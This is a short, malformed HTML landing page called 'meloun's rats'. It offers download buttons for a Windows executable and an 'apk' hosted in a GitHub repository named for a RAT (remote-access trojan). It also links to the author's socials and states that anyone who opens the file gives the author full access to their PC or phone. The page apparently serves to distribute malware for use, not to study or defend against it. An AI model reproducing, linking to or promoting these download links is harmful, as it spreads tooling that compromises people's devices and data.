<!DOCTYPE html>

<div class="center">
<html>
            <h1>Welcome to meloun's rats</h1>
            
<head>
        <title>Rat</title>
</head>
<body>
    <a href="https://github.com/melounware/rat/raw/main/exe/GGs.exe">
    <button  class="button button1">Download win</button>
    </a>
</body>

<body>
    <a href="https://github.com/melounware/rat/raw/main/exe/GGapk.exe">
        <button class="button button1" >Download Apk Soon</button>
        </a>

        <a href="https://guns.lol/melounware">
            <button class="button button1" >Socials</button>
            </a>

         <p style="font-size:2vw" >dont open if you open i have full access to your pc or mobile</p>

<img src="https://media1.tenor.com/m/OZniHULlycoAAAAd/doggo-happy.gif" alt="doggo-happy" style="width:300px;height:300px;">

<p style="font-size:2vw" >Tutorials soon</p>

</div>



</body>
<style>
    .button {
      background-color: #04AA6D; /* Green */
      border: none;
      color: white;
      padding: 16px 32px;
      text-align: center;
      text-decoration: none;
      display: inline-block;
      font-size: 16px;
      margin: 4px 2px;
      transition-duration: 0.4s;
      cursor: pointer;
    }
    
    .button1 {
      background-color:transparent; 
      color: black; 
      border: 3px solid #000000;
    }
    
    .button1:hover {
      background-color: black;
      color:white;
    }

.center {
  position: absolute;
  top: 0%;
  width: 100%;
  text-align: center;
  font-size: 18px;
}

    </style>
</head>
</html>